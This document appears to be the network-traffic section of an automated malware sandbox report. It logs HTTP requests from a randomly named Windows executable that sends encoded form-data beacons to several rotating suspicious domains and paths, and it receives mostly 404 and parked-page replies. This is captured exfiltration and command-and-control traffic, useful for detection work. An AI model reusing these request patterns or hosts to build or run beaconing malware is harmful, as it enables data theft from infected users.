                                                                                                                                Data Raw: 62 64 6c 44 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6c 4a 35 51 58 77 69 72 6c 2f 35 70 4d 51 62 72 61 75 67 37 51 39 55 71 65 70 76 49 70 6b 75 51 51 4c 68 42 52 58 53 58 48 6c 59 65 59 74 59 52 34 35 6f 70 75 65 2b 6d 6c 75 41 49 62 64 33 44 75 63 6e 2f 64 39 59 54 73 63 77 59 7a 78 34 51 39 64 56 4a 4c 77 42 38 34 45 4f 64 79 64 4b 7a 6a 4b 48 76 37 53 52 78 63 75 53 73 37 4d 2b 64 63 51 72 51 2f 76 32 48 33 78 78 50 6a 6c 4b 62 32 39 4b 39 54 65 51 34 68 42 53 4e 4b 2b 37 37 42 6f 4f 68 6a 53 74 61 42 41 63 4f 39 48 42 65 53 53 6d 4d 45 71 4b 54 6e 4e 5a 48 30 6d 39 71 42 72 68 53 4a 69 32 77 50 61 64 61 73 7a 6b 5a 6d 35 49 41 72 37 72 68 73 49 33 6d 70 39 70 6c 50 48 67 6c 67 46 4b 42 5a 65 44 4b 77 76 69 36 63 39 69 6a 2f 38 6b 59 43 46 6c 4d 69 46 4a 35 69 6c 49 2b 74 38 56 71 73 45 50 4d 6c 65 57 6a 78 4a 56 71 57 4d 39 47 6f 73 73 34 54 45 6c 55 6a 65 6f 6b 46 53 76 45 49 50 66 73 53 31 5a 56 43 47 33 78 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+elJ5QXwirl/5pMQbraug7Q9UqepvIpkuQQLhBRXSXHlYeYtYR45opue+mluAIbd3Ducn/d9YTscwYzx4Q9dVJLwB84EOdydKzjKHv7SRxcuSs7M+dcQrQ/v2H3xxPjlKb29K9TeQ4hBSNK+77BoOhjStaBAcO9HBeSSmMEqKTnNZH0m9qBrhSJi2wPadaszkZm5IAr7rhsI3mp9plPHglgFKBZeDKwvi6c9ij/8kYCFlMiFJ5ilI+t8VqsEPMleWjxJVqWM9Goss4TElUjeokFSvEIPfsS1ZVCG3x1DbqctvrYLDCOXHOumqT2FmK1RV6FEdL3iTuU6jX13R4W/aYPYdD5hyjTdKSucztqCIVRJwo9OFhdJzf6g2yQgJQHfKVdGUzmxcQ135tV+nFbielw5FP9hGYdpAC9Hf/LTmAZdq7YQigAXedCIuf8rjxjZUZrYHoeiSfbeH/dXc0TrBgmDwF9suwgSZzB5OImSPh28G8Zsw4LeJX+3PUeCDyHaoS1TInTOPhV+YYjVBXYBvm32hW48PAEv3CkgoNv9XND6YfQYmHxyKGG1JQ5OGWKLp9Fjcb74t0v5yOoueLYQ4Bk11YsTAZsRobA6YfVa9sVENeoEgWe+OUfPOB0yy4f0xfhzVvExJMA5j9/OrszEgsLfhAErZC4SMGbGc4aAbbIDeH+M9UqoUATtEvuz3dQow00jSGrjYicHTlhFJO9PeoqvAJkBgMUM/KlMNY0TDiPjMKnIx55ZGavY7zdLaGiE86blm/iWk2BfjVlwrIAbMOw3E0gWgcosibOABFaCbPaOvn76D1G8Yc581eJW/NoEZUYKxs3DaHPsICRh4Pe2Bdm6G5WzoYEZmsaYLJGIGfJgFkzT2jVTYVzQF/gbtmMKNSD6wCmD2AMGfF1as0tp3G3u4hq6lweI4clpvwe/GeQCDNwLZUbTM6NXdCBmRCEnNpRy1USF [TRUNCATED]
Nov 18, 2024 16:26:05.888365984 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Mon, 18 Nov 2024 15:26:05 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1154
                                                                                                                                x-request-id: a1819f69-808f-416c-ac35-ed00d029073d
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                set-cookie: parking_session=a1819f69-808f-416c-ac35-ed00d029073d; expires=Mon, 18 Nov 2024 15:41:05 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 18, 2024 16:26:05.888410091 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTE4MTlmNjktODA4Zi00MTZjLWFjMzUtZWQwMGQwMjkwNzNkIiwicGFnZV90aW1lIjoxNzMxOTQzNT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49992 | 199.59.243.227 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:07.793571949 CET | 397 | OUT | GET /ym43/?bdlD=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQscAddRW98P8tCbtJa8oLuk3yqY6cOAnXTMvRpBjAJYE68xAYSo=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.migraine-massages.pro
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 18, 2024 16:26:08.490135908 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Mon, 18 Nov 2024 15:26:08 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1534
                                                                                                                                x-request-id: 165e38e5-01d1-46e1-a97a-36f364691c1c
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jzbsF+n23rD4JtUD6e9GRb7FAFiObbVkedb2XsWOz+JbOxy3z4OcZlxyhNDLfkBRtNYZCy7oL3BS6Pj7ieXQng==
                                                                                                                                set-cookie: parking_session=165e38e5-01d1-46e1-a97a-36f364691c1c; expires=Mon, 18 Nov 2024 15:41:08 GMT; path=/
                                                                                                                                connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jzbsF+n23rD4JtUD6e9GRb7FAFiObbVkedb2XsWOz+JbOxy3z4OcZlxyhNDLfkBRtNYZCy7oL3BS6Pj7ieXQng==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 18, 2024 16:26:08.490158081 CET | 987 | IN |
Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTY1ZTM4ZTUtMDFkMS00NmUxLWE5N2EtMzZmMzY0NjkxYzFjIiwicGFnZV90aW1lIjoxNzMxOTQzNT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49994 | 209.74.64.58 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:21.658533096 CET | 640 | OUT | POST /afcr/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Host: www.pluribiz.life
Origin: http://www.pluribiz.life
Referer: http://www.pluribiz.life/afcr/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=kz8HCGjAWtoCXF71qdv7kEGHZnpWHa4N5Rw6n1IWSo3lymOnw/ta6x0WOeGuTCKuyvD/idw30nFVimJqn5rYKBPv0ilFHeU/7bGAl2p/Kup47BK6yxpvi3TdxHJ0qa7dyV1717h6IxP7EVo+4LlM5t5uYnHkVkg9fjGFmvnv4L2GCLOmnMH6YyTiM3bNdqkF9NT6G5hlmtIx
Nov 18, 2024 16:26:22.389053106 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:26:22 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49995 | 209.74.64.58 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:24.204941034 CET | 664 | OUT | POST /afcr/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Cache-Control: max-age=0
Connection: close
Host: www.pluribiz.life
Origin: http://www.pluribiz.life
Referer: http://www.pluribiz.life/afcr/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS7flyCKnz6Ba3R0WaOGvLiKpyvOKiYI30nRViiNqnIrfIRPh7CkjK+U/7bGAlwFRKux46x66yTNs8nTS4nJ0ua7RyV0c1+dcI3L7EXg+4ZdNzt4nGXHydnBxWVTJo8PTprGLOdT87/HZKizgM1D/dKkv/Nr6UutCpZtSYwmOD6smg/7eJcP+7GWveA==
Nov 18, 2024 16:26:24.939470053 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:26:24 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49996 | 209.74.64.58 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:26.756552935 CET | 1677 | OUT | POST /afcr/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Cache-Control: max-age=0
Connection: close
Host: www.pluribiz.life
Origin: http://www.pluribiz.life
Referer: http://www.pluribiz.life/afcr/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD= [TRUNCATED]
Nov 18, 2024 16:26:27.462975025 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:26:27 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49997 | 209.74.64.58 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:29.300158978 CET | 389 | OUT | GET /afcr/?92=DPyPNvf84fs0yXSp&bdlD=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8BGuo8VlMLN9CkLyFlXp6E4p5ywSBzzNp8Wyc9RtRv/+r7WpQ+fc= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.pluribiz.life
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 18, 2024 16:26:30.009793043 CET | 548 | IN | HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:26:29 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49999 | 47.242.89.146 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:35.826802969 CET | 631 | OUT | POST /1iqa/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Host: www.kdtzhb.top
Origin: http://www.kdtzhb.top
Referer: http://www.kdtzhb.top/1iqa/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=JKwJ9AShvSeAE4h/97/Ui2AjW35E366E6q9LwiEmQSYOclJEAV6dJllmcFQd6RiyYUIWynT4OOpFVRlba6AN+328vrfmsWS44aFg9toZYuDxPuK/WaJq3L3zKXW2YJOXKV8rPYCzEDL7ippI8OcL6/YNoBVUzICcYtmJCXLPBFezgi0yvsNMYDZUmn+XyPstc9N5gWKz3Ned
Nov 18, 2024 16:26:36.860110998 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 18 Nov 2024 15:26:36 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 50000 | 47.242.89.146 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:38.408535004 CET | 655 | OUT | POST /1iqa/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Cache-Control: max-age=0
Connection: close
Host: www.kdtzhb.top
Origin: http://www.kdtzhb.top
Referer: http://www.kdtzhb.top/1iqa/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkIOcGdEDRudIllmXlQc3xi5YUNrymv4OO9FVQVbaJoMs32+3bfkh2S44aFg9sMjYubxOea/X5Rp7r30C3W2SpOTKV9+Pd/oEFP7ioZIy6IMvPYLnhUr36TtWO3VGHDwcl2to0pozfNvKT5WmlmlyvsHe915yBGU457+EDFSJnDRqxhbqIHFyfTWww==

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 50001 | 47.242.89.146 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:41.103332996 CET | 1668 | OUT | POST /1iqa/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Cache-Control: max-age=0
Connection: close
Host: www.kdtzhb.top
Origin: http://www.kdtzhb.top
Referer: http://www.kdtzhb.top/1iqa/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 18, 2024 16:26:42.027108908 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 18 Nov 2024 15:26:41 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 50002 | 47.242.89.146 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:43.638916016 CET | 386 | OUT | GET /1iqa/?bdlD=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgSz03N/ngXbpk/5Fwdw8cafADp2cf4RIz4iuPQDTbp2HaXJhBs8=&92=DPyPNvf84fs0yXSp HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.kdtzhb.top
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 18, 2024 16:26:44.607912064 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 18 Nov 2024 15:26:44 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 50003 | 128.65.195.180 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:49.877959967 CET | 637 | OUT | POST /293d/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Host: www.evoo.website
Origin: http://www.evoo.website
Referer: http://www.evoo.website/293d/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=2ZmzkMINTYaaK+J4DKDO2kLt6i9Qesdx3EKIRFbAM2yBwaNolB9NFAYxo7nW885vYCifP5sYLzP4HQ70MvzDWKY31rDvUxqNbKcNSipoDdeJlEZqoQuQmlTFpsIcliIe0BMA7ugyEgED4tdMpgBHfQaFnMPiIi842f5AKEv0tL7xb+8HOTZjPVKf80fF53JjWVFBpWLZI9pd

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 50004 | 128.65.195.180 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:52.428956985 CET | 661 | OUT | POST /293d/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Cache-Control: max-age=0
Connection: close
Host: www.evoo.website
Origin: http://www.evoo.website
Referer: http://www.evoo.website/293d/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCeB3/xo3Q9NEAYxjbnXzc5wYCuXP8MYLzL4HV/0M/OxXaY1+LDXJhqNbKcNSjMDDZyJl0pqp0yPrFTa/8IcvCIa0BNV7sULEiMD4stMq1hARQaDjMO1OTB2uvMAUWD+0JSReIhdSgZAdFqd82H35XJJUV9B7BH+HJM+jZ6h1YwbVLg1FXeMyEBI4Q==

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 50005 | 128.65.195.180 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:54.973051071 CET | 1674 | OUT | POST /293d/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Cache-Control: max-age=0
Connection: close
Host: www.evoo.website
Origin: http://www.evoo.website
Referer: http://www.evoo.website/293d/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 50006 | 128.65.195.180 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:26:57.513317108 CET | 388 | OUT | GET /293d/?92=DPyPNvf84fs0yXSp&bdlD=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQfJK7OXgC3z9Q8k+eyxfCNOxpUJEtAyvn1uDuMR9mQoL/1sf57M= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.evoo.website
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 18, 2024 16:26:59.802262068 CET | 458 | IN | HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:26:59 GMT
Server: Apache/2.4.25 (Debian)
Content-Length: 278
Connection: close
Content-Type: text/html; charset=iso-8859-1
